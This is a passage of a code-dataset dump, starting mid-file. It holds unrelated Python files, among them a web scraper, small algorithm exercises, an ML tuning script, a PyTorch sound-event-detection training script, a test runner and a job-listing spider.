class_='leading').getText(),\n soup.find_all('div', class_='new-tv-pack-wrapper'))\n #numChannel = map(lambda x: x.find('div', class_='plan-content').find('div', class_='speeds-container').\n # find('span', class_='inlineText highlight').getText(),\n # soup.find_all('div', class_='new-tv-pack-wrapper'))\n #featuredChannels = map(lambda x: map(lambda z: z['title'], x.find_all('img')),\n # soup.find_all('div', class_='channel-featuring-inner-wrapper'))\n homePhone = map(lambda x: x.li.findNext('li').getText()[:-1], soup.find_all('ul', class_='list-unstyled'))\n #includes = map(lambda x: map(lambda z: z.getText(), x.find_all('a')), soup.find_all('ul', class_='include-details'))\n priceDollar = map(lambda x: x.find('span', class_='price-dollars').getText(),\n soup.find_all('ul', class_='details-bundles-pricing'))\n priceCent = map(lambda x: x.find('span', class_='price-cents').getText().split('/')[0],\n soup.find_all('ul', class_='details-bundles-pricing'))\n price = map(lambda x: '.'.join(x), zip(priceDollar, priceCent))\n saveDollar = map(lambda x: x.find('span', class_='price-dollars').getText(),\n soup.find_all('div', class_='discount-promo-bubble'))\n saveCent = map(lambda x: x.find('sup', class_='price-cents').getText().split('/')[0],\n soup.find_all('div', class_='discount-promo-bubble'))\n save = map(lambda x: ''.join(x), zip(saveDollar, saveCent))\n terms = map(lambda x: x.find('span', class_='price-period').getText().split('/')[0],\n soup.find_all('ul', class_='details-bundles-pricing'))\n additionalCost = map(lambda x: ','.join(map(lambda z: z.getText(), x.find_all('p'))),\n soup.find_all('div', class_='one-time-fee'))\n productMix = ['TV + Internet + Home phone' for i in range(8)]\n bundles = []\n for i in range(numBundle):\n temp = {\n 'hp': homePhone[i],\n #'include': ','.join(includes[i]),\n 'productMix': productMix[i],\n 'price': price[i].replace('$', ''),\n 'term': terms[i],\n # 'free_extra': '',\n #'featuredChannels': ','.join(featuredChannels[i]),\n #'numberOfChannels': '',\n 'tv': tv[i],\n 'internet': internet[i],\n 'name': 'bundle {0}'.format(i+1),\n 'limit': internetUsage[i],\n 'upload': uploadSpeed[i],\n 'download': downloadSpeed[i],\n 'additionalCost': additionalCost[i],\n 'priceBeforePromo': str(float(price[i].replace('$', '')) + float(save[i])),\n 'mobile': ''\n }\n bundles.append(temp)\n return 
bundles\n\n","sub_path":"residencePlan/residencePlanFunctions/rogersFunctions.py","file_name":"rogersFunctions.py","file_ext":"py","file_size_in_byte":12805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"478226394","text":"import fitFieldMap_v2 as fit\n\ndef main():\n field1 = 'Joes_output/cold_SSU.dat'\n field2 = 'Joes_output/warm_SSU.dat'\n run01 = 'Data/Data/Run01/Analysis/run1_polarCoordinates_forwardOnly.dat'\n\n fit.fitFieldMap(run01, field1, field2)\n\nif __name__==\"__main__\":\n main()\n","sub_path":"FitMapTest.py","file_name":"FitMapTest.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"394548855","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.6/dist-packages/mvc/observers/list_item_observer.py\n# Compiled at: 2020-03-07 03:51:49\n# Size of source mod 2**32: 2702 bytes\nimport weakref\nfrom .base import Observer\n\nclass ListItemObserver(Observer):\n __doc__ = \"\\n An observer that observes a single item in a list and informs us of changes.\\n The observed properties are defined in the list type's meta class by\\n setting their property descriptors 'tabular' attribute to True.\\n \"\n _previous_model_ref = None\n\n @property\n def _previous_model(self):\n if self._previous_model_ref is not None:\n return self._previous_model_ref()\n else:\n return\n\n @_previous_model.setter\n def _previous_model(self, value):\n self._previous_model_ref = weakref.ref(value, self.clear)\n\n def __init__(self, on_changed, model=None, spurious=False):\n super(ListItemObserver, self).__init__(spurious=spurious)\n self.on_changed = on_changed\n self.observe_model(model)\n\n def observe_model(self, model):\n if self._previous_model is not None:\n self.relieve_model(self._previous_model)\n if model is not None:\n for prop_name, data_type in model.Meta.get_column_properties():\n self.observe((self.on_prop_mutation), prop_name, assign=True)\n\n self._previous_model = model\n super(ListItemObserver, self).observe_model(model)\n\n def clear(self, *args):\n self.on_changed = None\n if len(args) == 0:\n self.observe_model(None)\n\n def on_prop_mutation(self, model, prop_name, info):\n if callable(self.on_changed):\n self.on_changed(model)","sub_path":"pycfiles/PyXRD-0.8.4.linux-x86_64.tar/list_item_observer.cpython-36.py","file_name":"list_item_observer.cpython-36.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"625365658","text":"from random import randint, seed\nfrom copy import deepcopy\n\nseed(a=0)\nclass Operand:\n def __init__(self, name, is_reg=False, is_imm=False, is_dummy=False, val=None, bits: int = 64):\n self.name = name\n self.is_reg = is_reg\n self.is_imm = is_imm\n self.is_dummy = is_dummy\n self.bits = bits\n self.val = val\n \nclass OperandDict:\n def __init__(self) -> None:\n self.all: dict[str, Operand] = {}\n self.randomize()\n\n def randomize(self) -> None:\n for op in self.all.values():\n op.val = op.val if op.is_imm else randint(-31, 31)\n \n def copy(self):\n return deepcopy(self)\n \n def same_as(self, op_dict) -> bool:\n for key in self.all:\n if key not in op_dict.all:\n continue\n if self.all[key].val != op_dict.all[key].val:\n return False\n return True\n \n def add(self, op: 
Operand) -> None:\n        if op.name not in self.all:\n            self.all[op.name] = op\n    \n    def ignore_dummies(self):\n        \"\"\"Return an OperandDict without the variables auto-generated by obfuscation.\n        \"\"\"\n        res = OperandDict()\n        for op in self.all.values():\n            if op.is_dummy:\n                continue\n            res.add(op)\n        return res\n    \n    def ignore_imm(self):\n        \"\"\"Return an OperandDict without the immediate values.\n        \"\"\"\n        res = OperandDict()\n        for op in self.all.values():\n            if op.is_imm:\n                continue\n            res.add(op)\n        return res\n    \n    def get_values(self):\n        return [op.val for op in self.all.values()]\n\n    @staticmethod\n    def extend(op1, op2) -> None:\n        for key in op1.all:\n            if key in op2.all:\n                op1.all[key].val = op2.all[key].val\n","sub_path":"libs/GAS/operand.py","file_name":"operand.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"125771187","text":"import time\r\nfrom math import *\r\n\r\nimport colour as col\r\nimport game_circle\r\n\r\n\r\nclass Board(object):\r\n    '''\r\n    Class to create and play on a single game\r\n    '''\r\n    pattern = [1,2,3,4,5,6] #Number of circles on each line\r\n    player1_col = col.RED #Colour for player 1\r\n    player2_col = col.BLUE #Colour for player 2\r\n    moves = [(i//2 + 1) for i in range(sum(pattern) - 1)] #Determines which number to place on game board\r\n    points_lost_p1 = 0 #For final point counting\r\n    points_lost_p2 = 0 #For final point counting\r\n    end_flag = 0 #Determines end of game, and other animation-based ideas\r\n    \r\n    def __init__(self, screen):\r\n        '''\r\n        Constructor\r\n        Only grid and player_turn are instance variables\r\n        '''\r\n        self.grid = [] #List of game circles\r\n        self.initialize_grid(screen)\r\n        self.player_turn = 0 #Determines player's turns\r\n        \r\n\r\n    def initialize_grid(self, screen):\r\n        '''\r\n        Determines centres and radii as per screen size\r\n        and generates the grid of game-circles as per requirement.\r\n        '''\r\n        centres = Board.get_centres(screen)\r\n        radius = Board.get_radius(centres)\r\n        for i in range(len(centres)):\r\n            #Create the game circle, add it to the list\r\n            ob = game_circle.game_circle(radius, centres[i])\r\n            self.grid.append(ob)\r\n\r\n    def draw_board(self, screen):\r\n        '''\r\n        Draws circles onto screen, and accounts for the endgame.\r\n        ''' \r\n        for circle in self.grid: #Draw circles\r\n            circle.draw_circle(screen)\r\n        if self.player_turn == len(Board.moves) and Board.end_flag==1: #Black out circles adjacent to black hole\r\n            Board.delay_loop(1)\r\n            self.adjacent_to_black_hole()\r\n            Board.end_flag = -1\r\n        elif self.player_turn == len(Board.moves) and Board.end_flag == 0: #Endgame flag\r\n            Board.end_flag = 1\r\n\r\n    def update_board(self, mpos):\r\n        '''\r\n        Updates the state of the board based on a mouse click.\r\n        '''\r\n        colour = None #Default initialization\r\n        if self.player_turn >= len(Board.moves): #If endgame, don't register the click\r\n            return None\r\n        for circle in self.grid:\r\n            #If a circle is clicked and it has not been clicked before, update the colour and value of that circle\r\n            if circle.is_clicked(mpos) and circle.colour == game_circle.game_circle.def_col:\r\n                #Determine which player's turn it is\r\n                if self.player_turn %2==1:\r\n                    colour = Board.player2_col\r\n                elif self.player_turn%2==0:\r\n                    colour = Board.player1_col\r\n                value = Board.moves[self.player_turn]\r\n                circle.update_circle(colour, value)\r\n                self.player_turn +=1\r\n                break\r\n\r\n    @staticmethod\r\n    def draw_static(board_dict):\r\n        pass\r\n\r\n    @staticmethod\r\n    def delay_loop(t):\r\n        '''\r\n        Gives a delay loop of exactly t 
seconds\r\n '''\r\n st = time.time()\r\n while time.time()-st lpf:\n if x % lpf == 0:\n x = x / lpf\n lpf = 2\n else:\n lpf += 1;\n print(\"Largest Prime Factor: %d\" % lpf);\n\n\ndef main():\n x = int(input(\"Input long int:\"))\n lpf(x);\n return 0;\n\n\nif __name__ == '__main__':\n main()","sub_path":"venv/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"553873407","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_percentage_error, mean_absolute_error, mean_squared_error\n\n\ndef main():\n print('Train and test PBSM-Multiplier tuning model')\n\n training_df = pd.read_csv('training_data_larger_medium_datasets.csv', header=0, sep=',')\n\n features = ['size_x', 'num_features_x', 'num_points_x', 'avg_area_x', 'avg_sidelength_1_x', 'avg_sidelength_2_x', 'e0_x' , 'e2_x',\n 'size_y', 'num_features_y', 'num_points_y', 'avg_area_y', 'avg_sidelength_1_y', 'avg_sidelength_2_y', 'e0_y', 'e2_y']\n label = ['pbsm_multiplier_best']\n\n train_data, test_data = train_test_split(training_df, test_size=0.20, random_state=41)\n\n X_train = pd.DataFrame.to_numpy(train_data[features])\n y_train = pd.DataFrame.to_numpy(train_data[label])\n X_test = pd.DataFrame.to_numpy(test_data[features])\n y_test = pd.DataFrame.to_numpy(test_data[label])\n\n reg_model = RandomForestRegressor(max_depth=8, random_state=11)\n model = reg_model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n\n y_test = y_test.flatten()\n print(y_test.shape)\n print(y_pred.shape)\n # print(np.array(y_test.flatten()))\n\n # test_df = pd.DataFrame()\n # test_df['y_test'] = 'a'\n # test_df['y_pred'] = y_pred\n # test_df.to_csv('test_df.csv')\n\n output_f = open('test.csv', 'w')\n output_f.writelines('y_test,y_pred\\n')\n for a, b in zip(y_test, y_pred):\n output_f.writelines('{},{}\\n'.format(a, b))\n output_f.close()\n\n mae = mean_absolute_error(y_test, y_pred)\n mape = mean_absolute_percentage_error(y_test, y_pred)\n mse = mean_squared_error(y_test, y_pred)\n print('{},{},{}'.format(mae, mape, mse))\n\n # Baseline\n y_pred_100 = [100] * len(y_pred)\n mae = mean_absolute_error(y_test, y_pred_100)\n mape = mean_absolute_percentage_error(y_test, y_pred_100)\n mse = mean_squared_error(y_test, y_pred_100)\n\n print('{},{},{}'.format(mae, mape, mse))\n\n training_df = pd.read_csv('training_data_larger_medium_datasets.csv', header=0, sep=',')\n y_100 = training_df['mbr_tests_100']\n y_best = training_df['mbr_tests_best']\n\n output_f = open('test_100.csv', 'w')\n output_f.writelines('mbr_tests_best,mbr_tests_100\\n')\n for a, b in zip(y_best, y_100):\n output_f.writelines('{},{}\\n'.format(a, b))\n output_f.close()\n\n mae = mean_absolute_error(y_best, y_100)\n mape = mean_absolute_percentage_error(y_best, y_100)\n mse = mean_squared_error(y_best, y_100)\n\n print('{},{},{}'.format(mae, mape, mse))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tuning/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"222747607","text":"# LC 396. 
Rotate Function\n\n'''\nYou are given an integer array nums of length n.\n\nAssume arrk to be an array obtained by rotating nums by k positions clock-wise. We define the rotation function F on nums as follow:\n\nF(k) = 0 * arrk[0] + 1 * arrk[1] + ... + (n - 1) * arrk[n - 1].\nReturn the maximum value of F(0), F(1), ..., F(n-1).\n\nThe test cases are generated so that the answer fits in a 32-bit integer.\n\nExample 1:\n\nInput: nums = [4,3,2,6]\nOutput: 26\nExplanation:\nF(0) = (0 * 4) + (1 * 3) + (2 * 2) + (3 * 6) = 0 + 3 + 4 + 18 = 25\nF(1) = (0 * 6) + (1 * 4) + (2 * 3) + (3 * 2) = 0 + 4 + 6 + 6 = 16\nF(2) = (0 * 2) + (1 * 6) + (2 * 4) + (3 * 3) = 0 + 6 + 8 + 9 = 23\nF(3) = (0 * 3) + (1 * 2) + (2 * 6) + (3 * 4) = 0 + 2 + 12 + 12 = 26\nSo the maximum value of F(0), F(1), F(2), F(3) is F(3) = 26.\n\nExample 2:\n\nInput: nums = [100]\nOutput: 0\n'''\nclass Solution:\n def maxRotateFunction(self, nums: List[int]) -> int:\n\n nsum = sum(nums)\n f0 = 0\n\n for i, n in enumerate(nums):\n f0 += i * n\n\n prev = f0\n res = f0\n\n for i in range(1, len(nums)):\n fi = prev + nsum - nums[len(nums) - i] * len(nums)\n res = max(res, fi)\n prev = fi\n\n return res\n","sub_path":"1. Problems/m. Math/d. Other - Math - Rotate Function.py","file_name":"d. Other - Math - Rotate Function.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"102359778","text":"n, li = int(input('Digite um número positivo: ')), []\n\nfor d in range(n, 0, -1):\n\n p = True\n\n for c in range(d-1, 1, -1):\n if d % c == 0:\n p = False\n else:\n if p:\n li.append(d)\nelse:\n li.sort()\n\nprint(f'Números primos entre 1 e {n}: ')\nprint(li)\n\n\n","sub_path":"EstruturaDeRepeticao/ex35.py","file_name":"ex35.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"605596073","text":"# A wrapper script that trains the SELDnet. 
The training stops when the SELD error (check paper) stops improving.\n# This is only for the training of SED, and DOA with regression strategy.\n\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport cls_feature_class\nimport cls_data_generator\nfrom metrics import evaluation_metrics\nimport parameter\nfrom tqdm import tqdm\nimport argparse\n\nimport torch\nimport torch.optim as optim\nfrom pytorch_model import CUDA, kaiming_init, mse_loss, bce_loss, weighted_mse_loss\nfrom pytorch_model import CRNN_SED, MTFA_SED, MCRNN_SED\nfrom torch.autograd import Variable\n\nplot.switch_backend('agg')\n\n\ndef collect_test_labels_3000(_data_gen_test):\n # Collecting ground truth for test data\n nb_batch = _data_gen_test.get_total_batches_in_data()\n batch_size = 1\n gt_sed = np.zeros((nb_batch * batch_size, 3000, 11))\n cnt = 0\n for _, tmp_label in _data_gen_test.generate():\n gt_sed[cnt * batch_size:(cnt + 1) * batch_size, :, :] = tmp_label[0]\n cnt = cnt + 1\n if cnt == nb_batch:\n break\n return gt_sed.astype(int)\n\n\ndef collect_test_labels(_data_gen_test, _data_out):\n # Collecting ground truth for test data\n nb_batch = _data_gen_test.get_total_batches_in_data()\n\n batch_size = _data_out[0][0]\n gt_sed = np.zeros((nb_batch * batch_size, _data_out[0][1], _data_out[0][2]))\n gt_doa = np.zeros((nb_batch * batch_size, _data_out[0][1], _data_out[1][2]))\n\n print('nb_batch in test: {}'.format(nb_batch))\n cnt = 0\n for _, tmp_label in _data_gen_test.generate():\n gt_sed[cnt * batch_size:(cnt + 1) * batch_size, :, :] = tmp_label[0]\n gt_doa[cnt * batch_size:(cnt + 1) * batch_size, :, :] = tmp_label[1]\n cnt = cnt + 1\n if cnt == nb_batch:\n break\n return gt_sed.astype(int), gt_doa\n\n\ndef save_model(model, model_name='model'):\n states = {'model_states': model.state_dict()}\n with open(model_name, 'wb+') as f:\n torch.save(states, f)\n\n\ndef load_model(model, model_name='model'):\n if os.path.isfile(model_name):\n with open(model_name, 'rb') as f:\n checkpoint = torch.load(f)\n model.load_state_dict(checkpoint['model_states'])\n else:\n raise ValueError('The specified model file does not exists!')\n return model\n \n\ndef main(args):\n '''\n Main wrapper for training sound event localization and detection network.\n \n :param argv: expects two optional inputs. \n first input: task_id - (optional) To chose the system configuration in parameters.py. (default) 1 - uses default parameters\n second input: job_id - (optional) all the output files will be uniquely represented with this. 
(default) 1\n '''\n # use parameter set defined by user\n dataset, mode, task_id, job_id = args.dataset, args.mode, args.name, args.job_id\n task = 'sed'; feat_type = 'mel'; nb_ch = 4; doa_type = None\n params, model_params = parameter.get_params(dataset=dataset, mode=mode, task_id=task_id, feat_type=feat_type, doa=doa_type)\n\n train_splits, val_splits, test_splits = None, None, None\n if params['mode'] == 'dev':\n test_splits = [1, 2, 3, 4]\n val_splits = [2, 3, 4, 1]\n train_splits = [[3, 4], [4, 1], [1, 2], [2, 3]]\n\n avg_scores_val = []\n avg_scores_test = []\n for split_cnt, split in enumerate(test_splits):\n print('\\nThis is split {}'.format(split_cnt))\n\n # Unique name for the run\n model_dir_prefix = os.path.join(params['model_dir'], task) if task == 'sed' else os.path.join(params['model_dir'], 'doa_reg')\n cls_feature_class.create_folder(model_dir_prefix)\n #model_id = int(job_id) + split_cnt\n unique_name = '{}{}_{}_{}_sed_dev_split{}'.format(task_id, str(job_id), params['dataset'], params['feat_type'], split_cnt+1)\n unique_name = os.path.join(model_dir_prefix, unique_name)\n model_name = '{}_model.h5'.format(unique_name)\n print('\\tmodel unique name: {}\\n'.format(unique_name))\n\n # Load train and validation data\n print('Loading training dataset:')\n data_gen_train = cls_data_generator.DataGenerator(\n dataset=params['dataset'], \n split=train_splits[split_cnt], \n batch_size=params['batch_size'],\n seq_len=params['seq_length'], \n feat_label_dir=params['feat_label_dir'],\n feat_type=feat_type,\n doa=doa_type\n )\n\n print('Loading validation dataset:')\n data_gen_val = cls_data_generator.DataGenerator(\n dataset=params['dataset'], \n split=val_splits[split_cnt], \n batch_size=params['batch_size'],\n seq_len=3000,\n per_file=True,\n feat_label_dir=params['feat_label_dir'],\n shuffle=False,\n feat_type=feat_type,\n doa=doa_type\n )\n\n # Collect the reference labels for validation data\n data_in, data_out = data_gen_train.get_data_sizes()\n print('FEATURES:\\n\\tdata_in: {}\\n\\tdata_out: {}\\n'.format(data_in, data_out))\n\n gt = collect_test_labels_3000(data_gen_val)\n sed_gt = evaluation_metrics.reshape_3Dto2D(gt) # [3000*100, 11]\n nb_classes = data_gen_train.get_nb_classes()\n def_elevation = data_gen_train.get_default_elevation()\n if task_id == 'crnn':\n model = CUDA(CRNN_SED(data_in, data_out[0]))\n elif task_id == 'mcrnn':\n model = CUDA(MCRNN_SED(data_in, data_out[0]))\n model.apply(kaiming_init)\n \n total_num = sum(param.numel() for param in model.parameters())\n print('==========================================')\n print('Total parameter number for {}: {}'.format(model_params['method'], total_num))\n print('==========================================')\n \n # Pytorch optimizer\n optimizer = optim.Adam(params=model.parameters(), lr=0.001)\n feat_torch = CUDA(Variable(torch.FloatTensor(params['batch_size'], nb_ch, params['seq_length'], params['feat_dim'])))\n label_sed = CUDA(Variable(torch.FloatTensor(params['batch_size'], params['seq_length'], 11)))\n best_seld_metric = 99999\n best_sed_metric = 99999\n best_epoch = -1\n patience_cnt = 0\n seld_metric = np.zeros(params['nb_epochs'])\n tr_loss = np.zeros(params['nb_epochs'])\n sed_val_loss = np.zeros(params['nb_epochs'])\n sed_metric = np.zeros((params['nb_epochs'], 2))\n nb_epoch = params['nb_epochs']\n \n # start training\n pbar_epoch = tqdm(total=nb_epoch, desc='[Epoch]')\n for epoch_cnt in range(nb_epoch):\n # train stage\n model.train()\n iter_cnt = 0\n for feat, label in data_gen_train.generate():\n 
feat_torch.resize_(params['batch_size'], nb_ch, params['seq_length'], params['feat_dim'])\n feat_torch.data.copy_(torch.from_numpy(feat))\n\n label_sed.resize_(params['batch_size'], params['seq_length'], 11)\n label_sed.data.copy_(torch.from_numpy(label[0]))\n sed = model(feat_torch)\n\n sed_loss = bce_loss(sed, label_sed)\n doa_loss = 0.0\n \n total_loss = sed_loss + doa_loss\n\n optimizer.zero_grad()\n total_loss.backward()\n optimizer.step()\n\n if iter_cnt % params['print_iter'] == 0:\n pbar_epoch.write('Iteration: {:3d}, sed_loss: {:.4f}, doa_loss: {:.4f}, total_loss: {:.4f}'.format(iter_cnt, sed_loss, doa_loss, total_loss))\n\n #pbar_iteration.update(1)\n iter_cnt += 1\n if iter_cnt >= data_gen_train.get_total_batches_in_data():\n break\n iter_cnt = 0\n sed_validation_loss = 0\n entire_pred_sed = np.zeros((data_gen_val._batch_size*data_gen_val.get_total_batches_in_data(), 3000, 11)) \n model.eval()\n with torch.no_grad():\n for feat, label in data_gen_val.generate():\n batch_size = feat.shape[0]\n \n feat_torch.resize_(batch_size, nb_ch, 3000, params['feat_dim'])\n feat_torch.data.copy_(torch.from_numpy(feat))\n label_sed.resize_(batch_size, 3000, 11)\n label_sed.copy_(torch.from_numpy(label[0]))\n\n sed = model(feat_torch)\n sed_loss = bce_loss(sed, label_sed)\n sed_validation_loss += sed_loss\n\n # concat all predictions\n entire_pred_sed[iter_cnt*batch_size:(iter_cnt+1)*batch_size, :] = sed.detach().cpu().numpy()\n iter_cnt += 1\n if iter_cnt >= data_gen_val.get_total_batches_in_data():\n break\n sed_validation_loss = sed_validation_loss/data_gen_val.get_total_batches_in_data()\n\n tr_loss[epoch_cnt] = total_loss\n sed_val_loss[epoch_cnt] = sed_validation_loss\n\n # Calculate the metrics\n sed_pred = evaluation_metrics.reshape_3Dto2D(entire_pred_sed) > params['threshold'] # compared with threshold \n sed_metric[epoch_cnt, :] = evaluation_metrics.compute_sed_scores(sed_pred, sed_gt, data_gen_val.nb_frames_1s())\n \n patience_cnt += 1\n if sed_metric[epoch_cnt, 0] < best_sed_metric:\n best_sed_metric = sed_metric[epoch_cnt, 0]\n best_epoch = epoch_cnt\n save_model(model, model_name)\n patience_cnt = 0\n\n pbar_epoch.update(1)\n \n pbar_epoch.write(\n 'epoch_cnt: %d, sed_tr_loss: %.4f, sed_val_loss: %.4f, ER_overall: %.2f, F1_overall: %.2f, best_sed_ER: %.4f, best_epoch : %d\\n' %\n (\n epoch_cnt, tr_loss[epoch_cnt], sed_val_loss[epoch_cnt],\n sed_metric[epoch_cnt, 0], sed_metric[epoch_cnt, 1],\n best_sed_metric, best_epoch\n )\n )\n\n if patience_cnt >= params['patience']:\n break\n\n pbar_epoch.close()\n\n avg_scores_val.append([sed_metric[best_epoch, 0], sed_metric[best_epoch, 1]])#, doa_metric[best_epoch, 0], doa_metric[best_epoch, 1], best_seld_metric])\n print('\\nResults on validation split:')\n print('\\tUnique_name: {} '.format(unique_name))\n print('\\tSaved model for the best_epoch: {}'.format(best_epoch))\n print('\\tSED Metrics: ER_overall: {}, F1_overall: {}\\n'.format(sed_metric[best_epoch, 0], sed_metric[best_epoch, 1]))\n \n \n # ------------------ Calculate metric scores for unseen test split ---------------------------------\n print('Loading testing dataset:')\n data_gen_test = cls_data_generator.DataGenerator(\n dataset=params['dataset'], split=split, batch_size=params['batch_size'], seq_len=3000,\n feat_label_dir=params['feat_label_dir'], shuffle=False, per_file=True,\n is_eval=True if params['mode'] == 'eval' else False, #False\n feat_type=feat_type, \n doa=doa_type\n )\n test_batch_size = data_gen_test._batch_size\n\n print('\nLoading the best model and 
predicting results on the testing split')\n model = load_model(model, '{}_model.h5'.format(unique_name))\n model.eval()\n \n # test stage\n total_test_batches = data_gen_test.get_total_batches_in_data()\n pbar_test = tqdm(total=total_test_batches, desc='[Testing]')\n iter_cnt = 0\n entire_test_sed = np.zeros((100, 3000, 11))\n with torch.no_grad():\n if params['mode'] == 'dev':\n for feat, label in data_gen_test.generate():\n batch_size = feat.shape[0]\n\n feat_torch.data.resize_(batch_size, nb_ch, 3000, params['feat_dim'])\n feat_torch.data.copy_(torch.from_numpy(feat))\n \n sed = model(feat_torch)\n # concat all predictions\n entire_test_sed[iter_cnt*test_batch_size:(iter_cnt+1)*test_batch_size, :] = sed.detach().cpu().numpy()\n pbar_test.update(1)\n iter_cnt += 1\n if iter_cnt >= data_gen_test.get_total_batches_in_data():\n break\n print('the test batch_size is {}'.format(batch_size))\n pbar_test.close()\n\n test_sed_pred = evaluation_metrics.reshape_3Dto2D(entire_test_sed) > params['threshold']\n if params['mode'] == 'dev':\n _, test_data_out = data_gen_test.get_data_sizes()\n test_gt = collect_test_labels_3000(data_gen_test)\n test_sed_gt = evaluation_metrics.reshape_3Dto2D(test_gt)\n test_sed_loss = evaluation_metrics.compute_sed_scores(test_sed_pred, test_sed_gt, data_gen_test.nb_frames_1s())\n avg_scores_test.append([test_sed_loss[0], test_sed_loss[1]])\n print('Results on test split:')\n print('\\tSED Metrics: ER_overall: {}, F1_overall: {}\\n'.format(test_sed_loss[0], test_sed_loss[1]))\n \n print('\\n\\nValidation split scores per fold:\\n')\n for cnt in range(len(val_splits)):\n print('\\t Split {} - SED ER: {} F1: {}'.format(\n val_splits[cnt], avg_scores_val[cnt][0], avg_scores_val[cnt][1]))\n \n if params['mode'] == 'dev':\n print('\\n\\nTesting split scores per fold:\\n')\n for cnt in range(len(val_splits)):\n print('\\t Split {} - SED ER: {} F1: {}'.format(\n test_splits[cnt], avg_scores_test[cnt][0], avg_scores_test[cnt][1]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='SELD')\n parser.add_argument('-gpu', default=7, type=int, help='choose gpu number')\n parser.add_argument('-m', '--mode', default='dev', type=str, choices=['dev', 'eval'], help='choose mode')\n parser.add_argument('-d', '--dataset', default='foa', type=str, choices=['foa', 'mic'], help='choose dataset')\n parser.add_argument('-n', '--name', default='crnn', type=str, help='unique name for each method')\n parser.add_argument('-id', '--job_id', default='1', type=str, help='unique output name for a specific method (different parameters)')\n args = parser.parse_args()\n os.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\n\n try:\n sys.exit(main(args))\n except (ValueError, IOError) as e:\n sys.exit(e)\n","sub_path":"seld_sed_dev.py","file_name":"seld_sed_dev.py","file_ext":"py","file_size_in_byte":14600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"127304594","text":"'''\nCreated on Aug 5, 2013\n\n@author: sean\n'''\nfrom __future__ import print_function\nimport unittest\nfrom os.path import dirname, join\nfrom argparse import ArgumentParser\nfrom binstar_client.tests.runner import ColorTextTestRunner\nfrom binstar_client.tests.coverage_report import report\n\ndef main():\n \n parser = ArgumentParser()\n parser.add_argument('--html', action='store_true')\n parser.add_argument('source_dir', nargs='?', default='')\n args = parser.parse_args()\n \n import coverage\n cov = coverage.coverage(include='**%s**' % args.source_dir 
if args.source_dir else '**/binstar_client/**',\n omit=['**/lib/python2.7/**', '**/site-packages/**', '**/tests/**',\n ])\n \n cov.start()\n import binstar_client\n print(binstar_client)\n loader = unittest.loader.TestLoader()\n discover_dir = join(dirname(binstar_client.__path__[0]), args.source_dir)\n print('Discover %s' % discover_dir)\n tests = loader.discover(discover_dir)\n runner = ColorTextTestRunner(verbosity=2)\n result = runner.run(tests) \n cov.stop()\n cov.save()\n total = report(cov)\n if args.html:\n cov.html_report(directory='htmlcov')\n \n runner.write_end(result, total)\n \n exit(0 if result.wasSuccessful() else -1)\n \n \nif __name__ == '__main__':\n main()\n","sub_path":"lib/python2.7/site-packages/binstar_client/tests/runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"625526634","text":"\"\"\"This file is a JobAggregator spider created on top of the PaginationList Template.\n\n scrapy crawl jobaggregator -a mining_job_id=9999 -a iteration=1 -a url=\"http://careers.dupont.com/jobsearch/\"\n\nsample urls:\n \"http://careers.bonton.com/jobsearch/\"\n \"http://careers.dupont.com/jobsearch/\"\n \"http://careers.hmhco.com/jobsearch/\"\n\"\"\"\nfrom urlparse import urljoin, urlsplit\n\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import TakeFirst, Join\n\nfrom brightcorp.base.atsspider2.templates import PaginationList\nfrom brightcorp.processors import Prefix\n\n\nclass JobAggregator(PaginationList):\n\n name = 'jobaggregator'\n url_fragmentanchor = '?region=All'\n\n def get_job_url(self, sel, response, *args, **kwargs):\n url = ItemLoader(selector=sel).get_xpath(\n 'a[@class=\"jobslink\"]/@href', TakeFirst())\n return urljoin(response.url, url)\n\n def get_referencenumber(self, sel, response):\n referencenumber = ItemLoader(selector=sel).get_xpath(\n ['//div[@class=\"right-more\"]/div[span/div/text()=\"Requisition #: \"]/span/div/b/text()',\n '//dd[preceding-sibling::dt/text()=\"Req Id\"][1]/p/text()',\n '//dd[preceding-sibling::dt/text()=\"Requisition ID\"][1]/p/text()'],\n TakeFirst())\n return \"%s-%s\" % (\n urlsplit(response.url).netloc.split(\".\")[1], referencenumber)\n\n def get_page_url(self, sel, response, *args, **kwargs):\n return urljoin(\n response.url,\n 'ajax-call.php?region=All&page=%s' % kwargs['page'])\n\n def get_items_per_page(self, sel, response, *args, **kwargs):\n if 'dupont' in response.url:\n return 10\n else:\n return 